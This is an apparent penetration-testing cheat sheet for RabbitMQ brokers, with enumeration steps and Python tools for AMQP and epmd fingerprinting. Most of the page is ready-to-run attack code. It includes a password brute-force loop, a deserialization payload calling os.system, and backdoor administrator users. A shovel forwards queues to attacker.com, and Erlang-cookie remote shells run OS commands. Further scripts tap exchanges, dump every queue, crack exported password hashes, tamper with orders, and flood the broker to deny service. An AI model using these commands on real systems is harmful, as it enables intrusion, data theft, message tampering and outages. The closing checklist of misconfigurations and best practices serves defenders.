RabbitMQ
Default Ports: 5672 (AMQP 0-9-1), 5671 (AMQP over TLS), 15672 (Management UI and HTTP API), 15671 (Management over TLS), 25672 (Erlang distribution: clustering and CLI tools), 4369 (epmd, the Erlang port mapper)
RabbitMQ is an open-source message broker that implements AMQP 0-9-1 (with plugins for AMQP 1.0, MQTT and STOMP). It routes and queues messages between distributed applications and is widely used in microservices architectures. A misconfigured broker exposes every message that passes through it, and its Erlang distribution port gives anyone holding the Erlang cookie code execution on the host.
Connect
Using Web Management Interface
# Access management UI
http://target.com:15672
https://target.com:15672
# Default credentials
guest:guest (built-in default; since RabbitMQ 3.3 it only works from localhost unless loopback_users was cleared)
# Login with credentials (admin:password stands throughout this page for credentials already obtained)
Username: admin
Password: password
Using rabbitmqadmin CLI
# Install rabbitmqadmin (the management plugin serves its own copy; needs Python)
wget http://target.com:15672/cli/rabbitmqadmin
chmod +x rabbitmqadmin
# Common options: -P port, -V vhost (default /), -s to use HTTPS
# List queues
./rabbitmqadmin -H target.com -u admin -p password list queues
# List exchanges
./rabbitmqadmin -H target.com -u admin -p password list exchanges
# List bindings
./rabbitmqadmin -H target.com -u admin -p password list bindings
# Get messages (requeued by default, so the queue is left as found apart from the redelivered flag)
./rabbitmqadmin -H target.com -u admin -p password get queue=queue_name
Using Python (pika library)
import pika
# Connect over AMQP (5672); admin:password stands for credentials already obtained
credentials = pika.PlainCredentials('admin', 'password')
parameters = pika.ConnectionParameters(
    'target.com',
    5672,
    '/',            # virtual host; enumerate the others via /api/vhosts
    credentials
)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
# Declare queue (creates it if absent; needs 'configure' permission and leaves a trace in the queue list)
channel.queue_declare(queue='test')
# Publish through the default exchange, which routes by queue name
channel.basic_publish(exchange='', routing_key='test', body='Hello')
# Fetch one message; basic_get returns (None, None, None) when the queue is empty
method, properties, body = channel.basic_get(queue='test', auto_ack=True)
print(body)
connection.close()
Recon
Service Detection with Nmap
Use Nmap to detect RabbitMQ services and identify server capabilities. The amqp-info script performs the AMQP handshake and prints the broker's server-properties (product, version, platform, cluster name) without credentials; epmd-info lists the Erlang node names and their distribution ports.
nmap -sV -p 4369,5671,5672,15671,15672,25672 --script amqp-info,epmd-info target.com
Banner Grabbing
Connect to RabbitMQ services to gather version and service information.
# Management API reference page (static file, served without a login when the plugin is enabled)
curl -i http://target.com:15672/api/index.html
# Get cluster name (any authenticated user)
curl -u guest:guest http://target.com:15672/api/cluster-name
# Get overview (includes rabbitmq_version, erlang_version and the enabled listeners)
curl -u guest:guest http://target.com:15672/api/overview
# Check whether authentication is required: a 401 with a JSON error body confirms the API is reachable
curl -i http://target.com:15672/api/whoami
Version Detection
Extract RabbitMQ version information from various sources.
# Get version from management API
curl -s -u admin:password http://target.com:15672/api/overview | jq -r '.rabbitmq_version, .erlang_version'
# From login page (the UI is static; the version string is normally only rendered after login)
curl -s http://target.com:15672/ | grep -i "rabbitmq"
# From response headers: the management plugin runs on Cowboy, which identifies itself but not the RabbitMQ version
curl -sI http://target.com:15672/nonexistent
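The handshake that nmap's amqp-info performs can be reproduced directly, which is useful where nmap is not available or the management port is firewalled. The following is an added example, not code from the original page or from the RabbitMQ project: it sends the AMQP 0-9-1 protocol header, parses the Connection.Start frame the broker answers with (the server-properties table plus the SASL mechanisms it offers), and aborts before any credentials are sent, so it also works against a broker that accepts no login at all. The host target.com and every value in SAMPLE_FRAME are assumptions constructed for offline testing.

```python
import socket
import struct

AMQP_PROTOCOL_HEADER = b"AMQP\x00\x00\x09\x01"   # "AMQP", protocol-id 0, version 0-9-1

def _shortstr(s):
    b = s.encode("utf-8")
    return bytes([len(b)]) + b

def _longstr(b):
    return struct.pack(">I", len(b)) + b

def _table(d):
    # Field table with the value types RabbitMQ uses in server-properties: t (bool), S (string), F (table)
    body = b""
    for key, val in d.items():
        body += _shortstr(key)
        if isinstance(val, bool):
            body += b"t" + bytes([int(val)])
        elif isinstance(val, str):
            body += b"S" + _longstr(val.encode("utf-8"))
        else:
            body += b"F" + _table(val)
    return struct.pack(">I", len(body)) + body

def build_connection_start(server_properties, mechanisms="PLAIN AMQPLAIN", locales="en_US"):
    # Connection.Start method frame (class 10, method 10) as a broker emits it; used for the offline sample
    args = bytes([0, 9]) + _table(server_properties) + _longstr(mechanisms.encode()) + _longstr(locales.encode())
    payload = struct.pack(">HH", 10, 10) + args
    return struct.pack(">BHI", 1, 0, len(payload)) + payload + b"\xce"   # METHOD frame, channel 0, frame-end

def _read_shortstr(buf, pos):
    n = buf[pos]
    return buf[pos + 1:pos + 1 + n].decode("utf-8", "replace"), pos + 1 + n

def _read_longstr(buf, pos):
    (n,) = struct.unpack_from(">I", buf, pos)
    return buf[pos + 4:pos + 4 + n], pos + 4 + n

def _read_table(buf, pos):
    (size,) = struct.unpack_from(">I", buf, pos)
    pos, end, out = pos + 4, pos + 4 + size, {}
    while pos < end:
        key, pos = _read_shortstr(buf, pos)
        tag, pos = chr(buf[pos]), pos + 1
        if tag == "t":
            out[key], pos = bool(buf[pos]), pos + 1
        elif tag == "S":
            raw, pos = _read_longstr(buf, pos)
            out[key] = raw.decode("utf-8", "replace")
        elif tag == "F":
            out[key], pos = _read_table(buf, pos)
        else:
            raise ValueError(f"unsupported field type {tag!r} for {key!r}")
    return out, end

def parse_connection_start(data):
    """Turn the broker's reply to the protocol header into a fingerprint dict."""
    if len(data) == 8 and data[:4] == b"AMQP":
        return {"error": "version mismatch", "server_header": data.hex()}   # broker replied with its own header
    ftype, channel, size = struct.unpack_from(">BHI", data, 0)
    payload = data[7:7 + size]
    if ftype != 1 or channel != 0 or data[7 + size] != 0xCE:
        raise ValueError("not a method frame on channel 0")
    class_id, method_id, vmajor, vminor = struct.unpack_from(">HHBB", payload, 0)
    if (class_id, method_id) != (10, 10):
        raise ValueError(f"expected Connection.Start, got {class_id}.{method_id}")
    props, pos = _read_table(payload, 6)          # product, version, platform, cluster_name, capabilities
    mechanisms, pos = _read_longstr(payload, pos)
    locales, _ = _read_longstr(payload, pos)
    return {"protocol": f"{vmajor}.{vminor}", **props,
            "mechanisms": mechanisms.decode().split(),   # ANONYMOUS here means no password is needed
            "locales": locales.decode().split()}

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("broker closed the connection during the handshake")
        buf += chunk
    return buf

def probe(host, port=5672, timeout=5.0):
    """Send only the protocol header and return the fingerprint; no credentials are sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(AMQP_PROTOCOL_HEADER)
        data = _recv_exact(s, 8)                  # 7-byte frame header + first payload byte
        if data[:4] != b"AMQP":
            (size,) = struct.unpack_from(">I", data, 3)
            data += _recv_exact(s, size)          # rest of the payload + frame-end octet
    return parse_connection_start(data)

# Constructed sample frame for offline use (values are made up, not captured from a broker)
SAMPLE_FRAME = build_connection_start({
    "capabilities": {"publisher_confirms": True, "basic.nack": True},
    "cluster_name": "rabbit@broker-01", "product": "RabbitMQ",
    "version": "3.12.4", "platform": "Erlang/OTP 26.1",
})
```

probe('target.com') runs it against a live listener. An ANONYMOUS entry in mechanisms means the listener accepts connections with no password, and a version-mismatch reply still proves an AMQP broker is there. The broker logs the TCP connection that closed before Connection.StartOk, so this is not silent.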
Enumeration
User Enumeration
Discover RabbitMQ users and their permissions.
# List users (requires admin)
curl -u admin:password http://target.com:15672/api/users
# Get current user
curl -u admin:password http://target.com:15672/api/whoami
# User permissions
curl -u admin:password http://target.com:15672/api/users/username/permissions
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password list users
Queue Enumeration
Explore RabbitMQ queues and their contents.
# List all queues
curl -u admin:password http://target.com:15672/api/queues
# Queue details
curl -u admin:password http://target.com:15672/api/queues/%2F/queue_name
# Messages in queue (the management API requires Content-Type: application/json on POST/PUT bodies).
# ack_requeue_true leaves the messages in place; ack_requeue_false removes them, which the real consumer will notice
curl -u admin:password http://target.com:15672/api/queues/%2F/queue_name/get \
  -X POST -H "Content-Type: application/json" \
  -d '{"count":10,"ackmode":"ack_requeue_true","encoding":"auto"}'
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password list queues \
name messages consumers
Exchange Enumeration
Discover RabbitMQ exchanges and their bindings.
# List exchanges
curl -u admin:password http://target.com:15672/api/exchanges
# Exchange details
curl -u admin:password http://target.com:15672/api/exchanges/%2F/amq.direct
# Bindings
curl -u admin:password http://target.com:15672/api/bindings
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password list exchanges
Virtual Host Enumeration
Discover RabbitMQ virtual hosts and their configurations.
# List vhosts
curl -u admin:password http://target.com:15672/api/vhosts
# Vhost permissions
curl -u admin:password http://target.com:15672/api/vhosts/%2F/permissions
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password list vhosts
Connection and Channel Info
Monitor active connections and channels.
# Active connections
curl -u admin:password http://target.com:15672/api/connections
# Active channels
curl -u admin:password http://target.com:15672/api/channels
# Consumers
curl -u admin:password http://target.com:15672/api/consumers
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password list connections
./rabbitmqadmin -H target.com -u admin -p password list channels
Attack Vectors
Default Credentials
RabbitMQ ships with a single built-in account, guest:guest; the other pairs below are common choices, not product defaults. The official Docker image creates its initial user from RABBITMQ_DEFAULT_USER and RABBITMQ_DEFAULT_PASS, so look for those in compose files and environment dumps.
# Credentials worth trying
guest:guest # Built-in default; restricted to loopback since 3.3 unless loopback_users was set to none
admin:admin
administrator:administrator
user:user
test:test
# Try with curl
curl -u guest:guest http://target.com:15672/api/overview
# Check if the guest account is usable remotely (200 means the loopback restriction was removed)
curl -i -u guest:guest http://target.com:15672/api/whoami
Brute Force Attack
Brute forcing the management interface can reveal weak credentials. There is no built-in lockout, but every failed login is written to the broker log, so the attempt is noisy.
Using Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  -s 15672 target.com http-get /api/whoami
Using Burp Suite Intruder
# Capture request to /api/whoami
# Send to Intruder
# Set Authorization header as payload position
Using Custom Script
# Check the HTTP status rather than the body: a failed login returns 401 with a JSON error, success returns 200
while IFS= read -r pass; do
  code=$(curl -s -o /dev/null -w '%{http_code}' -u "admin:$pass" http://target.com:15672/api/whoami)
  if [ "$code" = "200" ]; then
    echo "[+] Found: admin:$pass"
    break
  fi
done < passwords.txt
Message Interception
Intercept and consume messages from RabbitMQ queues. Reading through /get with ack_requeue_true puts the messages back but flags them redelivered and may reorder them; consuming with auto_ack removes them, so the legitimate consumer never sees them.
# List queues and get messages
curl -u admin:password http://target.com:15672/api/queues
# Get messages from specific queue (count is per call; repeat or consume for large queues)
curl -u admin:password http://target.com:15672/api/queues/%2F/orders/get \
  -X POST \
  -H "Content-Type: application/json" \
  -d '{"count":100,"ackmode":"ack_requeue_true","encoding":"auto"}'
# Consume all messages (destructive: competes with the real consumers and removes what it receives)
python3 << 'EOF'
import pika
credentials = pika.PlainCredentials('admin', 'password')
connection = pika.BlockingConnection(
    pika.ConnectionParameters('target.com', 5672, '/', credentials)
)
channel = connection.channel()
def callback(ch, method, properties, body):
    # properties.content_type and headers usually reveal the serializer (json, pickle, protobuf ...)
    print(f"Message: {body!r} props={properties}")
    with open('messages.txt', 'ab') as f:
        f.write(body + b'\n')          # raw bytes: payloads are not always text
channel.basic_consume(queue='queue_name', on_message_callback=callback, auto_ack=True)
channel.start_consuming()
EOF
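Both the /get call and the pika consumer above take messages out of the queue, which a legitimate consumer will notice. The quieter approach is to tap the exchange: bind a queue of your own so the broker delivers a copy of everything the exchange routes while the real queues keep receiving. The following is an added example, not from the original page or the RabbitMQ project. It plans the bindings from the /api/exchanges and /api/bindings output (one "#" binding for a topic exchange, one keyless binding for fanout, one binding per routing key already in use for direct, the existing argument sets for headers) and applies them through the management API using only the standard library. The sample exchange and binding lists, the tap queue name, and target.com / admin:password are constructed assumptions.

```python
import base64
import json
import urllib.parse
import urllib.request

def plan_tap_bindings(exchanges, bindings, tap_queue="tap"):
    """Return (plan, skipped): bindings that give tap_queue a copy of what each exchange routes."""
    plan, skipped = [], []
    for ex in exchanges:
        vhost, name, etype = ex["vhost"], ex["name"], ex["type"]
        mine = [b for b in bindings
                if b["vhost"] == vhost and b["source"] == name and b["destination"] != tap_queue]
        if name == "":
            # The default exchange cannot be bound to; messages published with exchange=""
            # can only be read from the target queue itself (basic_get / consume)
            skipped.append((vhost, name, "default exchange is not bindable"))
        elif etype == "fanout":
            plan.append((vhost, name, "", {}))              # fanout ignores the routing key
        elif etype == "topic":
            plan.append((vhost, name, "#", {}))             # '#' matches every routing key
        elif etype == "direct":
            keys = sorted({b["routing_key"] for b in mine})
            if not keys:
                skipped.append((vhost, name, "direct exchange with no bindings: keys unknown"))
            plan.extend((vhost, name, key, {}) for key in keys)   # one binding per key in use
        elif etype == "headers":
            seen = set()
            for b in mine:
                args = b.get("arguments", {})
                sig = json.dumps(args, sort_keys=True)
                if sig not in seen:
                    seen.add(sig)
                    plan.append((vhost, name, "", args))
        else:
            skipped.append((vhost, name, f"unhandled exchange type {etype}"))
    return plan, skipped

def _call(base_url, auth, method, path, body=None):
    req = urllib.request.Request(base_url + path, method=method,
                                 data=None if body is None else json.dumps(body).encode())
    req.add_header("Authorization", "Basic " + base64.b64encode(auth.encode()).decode())
    req.add_header("Content-Type", "application/json")     # required by the management API
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status

def apply_tap_plan(base_url, auth, plan, tap_queue="tap", max_length=10000):
    """Create the tap queue in each vhost and add the planned bindings via the management API."""
    def q(s):
        return urllib.parse.quote(s, safe="")               # the "/" vhost must become %2F
    for vhost in sorted({p[0] for p in plan}):
        _call(base_url, auth, "PUT", f"/api/queues/{q(vhost)}/{q(tap_queue)}",
              {"durable": False, "auto_delete": False,
               "arguments": {"x-max-length": max_length}})   # oldest copies are dropped, memory stays bounded
    for vhost, exchange, key, args in plan:
        _call(base_url, auth, "POST", f"/api/bindings/{q(vhost)}/e/{q(exchange)}/q/{q(tap_queue)}",
              {"routing_key": key, "arguments": args})

# Constructed sample of what /api/exchanges and /api/bindings return (not from a real broker)
SAMPLE_EXCHANGES = [
    {"vhost": "/", "name": "", "type": "direct"},
    {"vhost": "/", "name": "orders", "type": "direct"},
    {"vhost": "/", "name": "events", "type": "topic"},
    {"vhost": "/", "name": "broadcast", "type": "fanout"},
]
SAMPLE_BINDINGS = [
    {"vhost": "/", "source": "orders", "destination": "orders.created", "routing_key": "created", "arguments": {}},
    {"vhost": "/", "source": "orders", "destination": "orders.paid", "routing_key": "paid", "arguments": {}},
    {"vhost": "/", "source": "events", "destination": "audit", "routing_key": "user.#", "arguments": {}},
]

if __name__ == "__main__":
    plan, skipped = plan_tap_bindings(SAMPLE_EXCHANGES, SAMPLE_BINDINGS)
    print("plan:", plan, "skipped:", skipped)
    # apply_tap_plan("http://target.com:15672", "admin:password", plan)   # then: rabbitmqadmin get queue=tap
```

Declaring the tap queue needs configure permission on it, and each binding needs write on the queue and read on the exchange. The tap is visible in /api/bindings and the management UI like any other binding, and messages published straight to the default exchange still have to be read from their queue with /get.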
Message Injection
Inject malicious messages into RabbitMQ queues.
# Publish malicious message to queue
curl -u admin:password http://target.com:15672/api/exchanges/%2F/amq.default/publish \
-X POST \
-H "Content-Type: application/json" \
-d '{
"properties":{},
"routing_key":"target_queue",
"payload":"malicious_payload",
"payload_encoding":"string"
}'
# Using Python
import pika
credentials = pika.PlainCredentials('admin', 'password')
connection = pika.BlockingConnection(
    pika.ConnectionParameters('target.com', 5672, '/', credentials)
)
channel = connection.channel()
# Inject a payload aimed at the consumer's deserializer. The message is inert on the broker;
# it only executes if the worker evals, unpickles or templates the field, so match the
# content_type and format seen in legitimate messages first.
payload = '{"cmd":"__import__(\'os\').system(\'whoami\')"}'
channel.basic_publish(exchange='', routing_key='tasks', body=payload,
                      properties=pika.BasicProperties(content_type='application/json'))
connection.close()
User Creation and Privilege Escalation
Create new users and escalate privileges in RabbitMQ. Creating users and setting tags requires the administrator tag on the account you authenticate with; permissions are granted per vhost, so repeat the permissions call for every vhost listed at /api/vhosts.
# Create new admin user
curl -u admin:password http://target.com:15672/api/users/backdoor \
-X PUT \
-H "Content-Type: application/json" \
-d '{"password":"P@ssw0rd123!","tags":"administrator"}'
# Set permissions
curl -u admin:password http://target.com:15672/api/permissions/%2F/backdoor \
-X PUT \
-H "Content-Type: application/json" \
-d '{"configure":".*","write":".*","read":".*"}'
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password declare user \
name=backdoor password=P@ssw0rd123! tags=administrator
Shovel Plugin Abuse
Exploit the RabbitMQ Shovel plugin for message forwarding. A dynamic shovel makes the broker itself open an outbound AMQP connection, so it works even when the attacker cannot reach 5672 directly. It needs the rabbitmq_shovel plugin enabled and a user with the policymaker or administrator tag, and it is listed under /api/shovels and /api/parameters/shovel.
# If the shovel plugin is enabled, forward messages from a queue to a broker the attacker controls
curl -u admin:password http://target.com:15672/api/parameters/shovel/%2F/my-shovel \
  -X PUT \
  -H "Content-Type: application/json" \
  -d '{
    "value": {
      "src-uri": "amqp://",
      "src-queue": "source_queue",
      "dest-uri": "amqp://user:pass@attacker.com",
      "dest-queue": "stolen_messages"
    }
  }'
# src-uri "amqp://" is the local node; the destination needs an account with write permission on the
# attacker's broker (guest only works from loopback there too)
# All messages from source_queue are consumed by the shovel and forwarded, so the legitimate consumer stops receiving them
Erlang Cookie Exploitation
Exploit the Erlang cookie for direct node access. The cookie is the only secret protecting the distribution port: anyone holding it gets an Erlang shell on the node, running as the rabbitmq OS user.
# Locations: /var/lib/rabbitmq/.erlang.cookie (service account), ~/.erlang.cookie (whoever runs the CLI),
# the RABBITMQ_ERLANG_COOKIE environment variable; the file should be mode 400, so a readable copy is a finding in itself
# Requirements: 4369 (epmd) and the distribution port (25672 by default) reachable; epmd reveals the node name
nmap -p 4369 --script epmd-info target-host
# Node naming must match: RabbitMQ defaults to short names (rabbit@host), so use -sname; -name is only for nodes run with long names
erl -sname attacker -setcookie COOKIE -remsh rabbit@target-host
# Inside the remote shell (3.7+ adds a third "acting user" argument to add_user/set_tags; older releases take two)
rabbit_auth_backend_internal:list_users().
rabbit_auth_backend_internal:add_user(<<"backdoor">>, <<"password">>, <<"cli">>).
rabbit_auth_backend_internal:set_tags(<<"backdoor">>, [administrator], <<"cli">>).
# The shell is arbitrary code execution on the host, not just broker administration
os:cmd("id").
# Same access through the CLI if rabbitmqctl is installed locally (eval runs Erlang on the target node)
rabbitmqctl -n rabbit@target-host --erlang-cookie COOKIE list_users
rabbitmqctl -n rabbit@target-host --erlang-cookie COOKIE eval 'os:cmd("id").'
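Before trying -remsh you need the node name and the distribution port, and epmd on 4369 hands both out to anyone who asks. The following is an added example, not from the original page or from RabbitMQ: it sends the EPMD NAMES_REQ (the byte 'n' with a 2-byte length prefix) and parses the reply, which is epmd's own port followed by one "name <node> at port <port>" line per registered node. SAMPLE_NAMES_RESP is a constructed reply and target-host is an assumption.

```python
import socket
import struct

EPMD_PORT = 4369
NAMES_REQ = struct.pack(">H", 1) + b"n"        # 2-byte length of the request body, then 'n' = NAMES_REQ

def parse_names_response(data):
    """Parse an EPMD NAMES_RESP: 4-byte epmd port, then lines 'name <node> at port <n>'."""
    if len(data) < 4:
        raise ValueError("short epmd response")
    (epmd_port,) = struct.unpack_from(">I", data, 0)
    nodes = {}
    for line in data[4:].decode("ascii", "replace").splitlines():
        parts = line.split()                       # ['name', 'rabbit', 'at', 'port', '25672']
        if len(parts) == 5 and parts[0] == "name" and parts[2:4] == ["at", "port"]:
            nodes[parts[1]] = int(parts[4])        # node name -> Erlang distribution port
    return epmd_port, nodes

def query_epmd(host, port=EPMD_PORT, timeout=5.0):
    """Ask epmd which Erlang nodes are registered and on which distribution ports."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(NAMES_REQ)
        data = b""
        while True:                                # epmd closes the socket once the reply is sent
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return parse_names_response(data)

# Constructed sample reply (not captured from a live host): two RabbitMQ nodes on one machine
SAMPLE_NAMES_RESP = struct.pack(">I", 4369) + b"name rabbit at port 25672\nname rabbit2 at port 25673\n"

if __name__ == "__main__":
    print(parse_names_response(SAMPLE_NAMES_RESP))
    # print(query_epmd("target-host"))
```

A result of {'rabbit': 25672} means the node to name in -remsh is rabbit@target-host (short name, so -sname), and that 25672 must be reachable for the distribution connection itself; an empty dict means nothing is registered with that epmd.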
Post-Exploitation
Data Exfiltration
Extract sensitive data from RabbitMQ systems.
# Dump every queue in every vhost; ack_requeue_true puts the messages back (but marks them redelivered).
# jq's @uri encodes the vhost ("/" becomes %2F) and queue name for both the URL and the file name
curl -s -u admin:password http://target.com:15672/api/queues \
  | jq -r '.[] | "\(.vhost|@uri) \(.name|@uri)"' \
  | while read -r vhost queue; do
      echo "[+] Dumping queue: $vhost/$queue"
      curl -s -u admin:password "http://target.com:15672/api/queues/$vhost/$queue/get" \
        -X POST -H "Content-Type: application/json" \
        -d '{"count":1000,"ackmode":"ack_requeue_true","encoding":"auto"}' \
        > "${vhost}_${queue}_messages.json"
    done
# Export configuration
curl -u admin:password http://target.com:15672/api/definitions > rabbitmq_config.json
# Export users and permissions
curl -u admin:password http://target.com:15672/api/users > users.json
curl -u admin:password http://target.com:15672/api/permissions > permissions.json
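The definitions export contains every user's password_hash and hashing_algorithm, so the default-credential and brute-force checks from the Attack Vectors section can be done offline, without touching the management interface or filling its log with failed logins. The following is an added example, not code from the original page or from RabbitMQ: it reimplements RabbitMQ's password hashing scheme (a 4-byte salt, the digest of salt plus password, both base64-encoded together), tests exported hashes against a small wordlist, and flags the guest account, administrator tags and wildcard permissions in the same pass. WEAK_PASSWORDS and the SAMPLE_DEFINITIONS export (whose hashes are generated inside the block) are constructed assumptions; use a real wordlist in practice.

```python
import base64
import hashlib
import hmac
import json

ALGORITHMS = {
    "rabbit_password_hashing_sha256": hashlib.sha256,   # default since 3.6
    "rabbit_password_hashing_sha512": hashlib.sha512,
    "rabbit_password_hashing_md5": hashlib.md5,         # legacy; users created before 3.6 have no algorithm field
}

def rabbitmq_hash(password, salt, algorithm="rabbit_password_hashing_sha256"):
    """RabbitMQ scheme: base64(salt || H(salt || password)) with a 4-byte salt."""
    digest = ALGORITHMS[algorithm](salt + password.encode("utf-8")).digest()
    return base64.b64encode(salt + digest).decode("ascii")

def verify_hash(password_hash, candidate, algorithm="rabbit_password_hashing_sha256"):
    """Check a candidate against an exported password_hash; the salt is the first 4 decoded bytes."""
    raw = base64.b64decode(password_hash)
    salt, stored = raw[:4], raw[4:]
    computed = ALGORITHMS[algorithm](salt + candidate.encode("utf-8")).digest()
    return hmac.compare_digest(computed, stored)

WEAK_PASSWORDS = ["guest", "admin", "password", "rabbitmq", "123456"]   # constructed; extend with a real wordlist

def audit_definitions(defs, wordlist=WEAK_PASSWORDS):
    """Flag risky users and permissions in a /api/definitions export; returns (user, finding) pairs."""
    findings = []
    for u in defs.get("users", []):
        name = u["name"]
        tags = u.get("tags", "")
        if isinstance(tags, str):                  # older exports use "a,b"; newer ones use ["a", "b"]
            tags = [t for t in tags.split(",") if t]
        if name == "guest":
            findings.append((name, "built-in guest account still present"))
        if "administrator" in tags:
            findings.append((name, "administrator tag"))
        algo = u.get("hashing_algorithm", "rabbit_password_hashing_md5")   # absent field means pre-3.6 MD5
        for cand in wordlist:
            if verify_hash(u["password_hash"], cand, algo):
                findings.append((name, f"weak password: {cand}"))
                break
    for p in defs.get("permissions", []):
        if (p["configure"], p["write"], p["read"]) == (".*", ".*", ".*"):
            findings.append((p["user"], f"full configure/write/read on vhost {p['vhost']!r}"))
    return findings

def audit_file(path):
    """Run the audit over a saved /api/definitions export, e.g. rabbitmq_config.json."""
    with open(path, encoding="utf-8") as f:
        return audit_definitions(json.load(f))

# Constructed export (hashes generated here, not taken from a real broker)
SAMPLE_DEFINITIONS = {
    "users": [
        {"name": "guest", "tags": "administrator",
         "hashing_algorithm": "rabbit_password_hashing_sha256",
         "password_hash": rabbitmq_hash("guest", b"\x00\x01\x02\x03")},
        {"name": "orders-svc", "tags": [],
         "hashing_algorithm": "rabbit_password_hashing_sha256",
         "password_hash": rabbitmq_hash("c0rrect-h0rse-battery-staple", b"\x10\x20\x30\x40")},
    ],
    "permissions": [
        {"user": "guest", "vhost": "/", "configure": ".*", "write": ".*", "read": ".*"},
        {"user": "orders-svc", "vhost": "/", "configure": "^orders\\.", "write": "^orders\\.", "read": "^orders\\."},
    ],
}

if __name__ == "__main__":
    for user, finding in audit_definitions(SAMPLE_DEFINITIONS):
        print(f"[!] {user}: {finding}")
```

audit_file('rabbitmq_config.json') applies the same checks to the export produced above. The salt is only four bytes and the digest is a single unsalted-iteration SHA-256, so a leaked export is crackable at hashcat speeds; that is the reason /api/definitions is restricted to administrators.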
Persistence
Create persistent backdoor access to RabbitMQ systems. Users, permissions and durable queues are written to the node's definitions store and survive restarts; nothing is hidden from /api/users or the queue list, so the best a backdoor can do is blend in by name.
# Create backdoor user with admin privileges
curl -u admin:password http://target.com:15672/api/users/system-monitor \
  -X PUT -H "Content-Type: application/json" \
  -d '{"password":"ComplexP@ss123!","tags":"administrator"}'
# Set full permissions (per vhost; repeat for every vhost of interest)
curl -u admin:password http://target.com:15672/api/permissions/%2F/system-monitor \
  -X PUT -H "Content-Type: application/json" \
  -d '{"configure":".*","write":".*","read":".*"}'
# Durable queue for C2 or staging data (a leading "." does not hide it; it is listed like any other queue)
curl -u admin:password http://target.com:15672/api/queues/%2F/.system \
  -X PUT -H "Content-Type: application/json" \
  -d '{"durable":true}'
Message Manipulation
Modify messages in RabbitMQ queues for malicious purposes. There is no in-place edit: messages are drained (ack_requeue_false removes them), altered and republished. Any consumer that dequeued in the meantime has already seen the originals, and only the order within this batch is preserved.
# Drain the queue
messages=$(curl -s -u admin:password http://target.com:15672/api/queues/%2F/orders/get \
  -X POST -H "Content-Type: application/json" \
  -d '{"count":100,"ackmode":"ack_requeue_false","encoding":"auto"}')
# Modify and republish through the exchange each message originally came from ("" is the default exchange,
# addressed as amq.default in the API), keeping properties so consumers see the same content_type and headers
echo "$messages" | jq -c '.[]' | while read -r msg; do
  # Modify message (e.g. change prices, quantities, etc.); the publish body wants only these four fields
  modified=$(echo "$msg" | jq -c '.payload = "modified_payload"
      | {routing_key, payload, payload_encoding, properties}')
  exchange=$(echo "$msg" | jq -r 'if .exchange == "" then "amq.default" else .exchange end | @uri')
  curl -s -u admin:password "http://target.com:15672/api/exchanges/%2F/$exchange/publish" \
    -X POST -H "Content-Type: application/json" -d "$modified"
done
Denial of Service
Perform denial of service attacks against RabbitMQ systems. The effective lever is the broker's own resource alarms: when disk_free_limit or vm_memory_high_watermark is crossed, the node blocks every publisher on every vhost until the alarm clears, so one unconsumed queue can stop all producers.
# Flood queue with messages (one HTTP request per message is slow; use pika or rabbitmqadmin for volume)
for i in {1..100000}; do
  curl -s -o /dev/null -u admin:password http://target.com:15672/api/exchanges/%2F/amq.default/publish \
    -X POST -H "Content-Type: application/json" \
    -d "{\"routing_key\":\"target_queue\",\"payload\":\"DoS_$i\",\"payload_encoding\":\"string\"}"
done
# Create resource-intensive bindings (every binding is replicated in the cluster's metadata store)
for i in {1..1000}; do
  curl -s -o /dev/null -u admin:password http://target.com:15672/api/bindings/%2F/e/exchange/q/queue \
    -X POST -H "Content-Type: application/json" -d "{\"routing_key\":\"key_$i\"}"
done
# Exhaust disk: a durable queue with no consumer, filled with persistent messages (delivery_mode 2)
curl -u admin:password http://target.com:15672/api/queues/%2F/disk-filler \
  -X PUT -H "Content-Type: application/json" -d '{"durable":true}'
curl -u admin:password http://target.com:15672/api/exchanges/%2F/amq.default/publish \
  -X POST -H "Content-Type: application/json" \
  -d '{"routing_key":"disk-filler","properties":{"delivery_mode":2},"payload":"AAAA...","payload_encoding":"string"}'
# Repeat the publish with large payloads until the disk alarm fires; a max-length policy on the queue defeats this
Common RabbitMQ API Endpoints
Endpoint | Method | Description | Auth Required |
---|---|---|---|
/api/overview | GET | Server overview | Yes |
/api/whoami | GET | Current user info | Yes |
/api/users | GET | List users | Admin |
/api/queues | GET | List queues | Yes |
/api/exchanges | GET | List exchanges | Yes |
/api/bindings | GET | List bindings | Yes |
/api/vhosts | GET | List virtual hosts | Yes |
/api/connections | GET | List connections | monitoring tag (others see only their own) |
/api/definitions | GET | Export configuration | Admin |
Useful Tools
Tool | Description | Primary Use Case |
---|---|---|
rabbitmqadmin | Official CLI tool | Management and automation |
pika | Python AMQP library | Programmatic access |
curl | HTTP client | API interaction |
Burp Suite | Web proxy | API testing |
Nmap | Network scanner | Service detection |
Metasploit | Exploitation framework | Automated testing |
Security Misconfigurations to Test
- ❌ Default credentials (guest:guest)
- ❌ Weak admin passwords
- ❌ Management interface exposed to internet
- ❌ No TLS/SSL encryption
- ❌ Guest account enabled remotely
- ❌ Overly permissive user permissions
- ❌ Default or anonymous credentials accepted on the AMQP listener (5672)
- ❌ Erlang cookie exposed or weak
- ❌ Shovel/Federation plugins misconfigured
- ❌ No queue length limits (max-length policies) or per-user connection/channel limits
- ❌ Sensitive data in messages
- ❌ No message encryption
- ❌ Verbose error messages
- ❌ Outdated RabbitMQ version
Message Queue Security Best Practices
- ✅ Change default credentials
- ✅ Use strong passwords for all users
- ✅ Implement TLS/SSL encryption
- ✅ Disable guest account for remote access
- ✅ Use principle of least privilege
- ✅ Firewall 4369 and 25672 to cluster peers and require authenticated TLS on every client listener
- ✅ Protect Erlang cookie
- ✅ Regularly update RabbitMQ
- ✅ Implement message encryption
- ✅ Monitor and log access
- ✅ Use virtual hosts for isolation
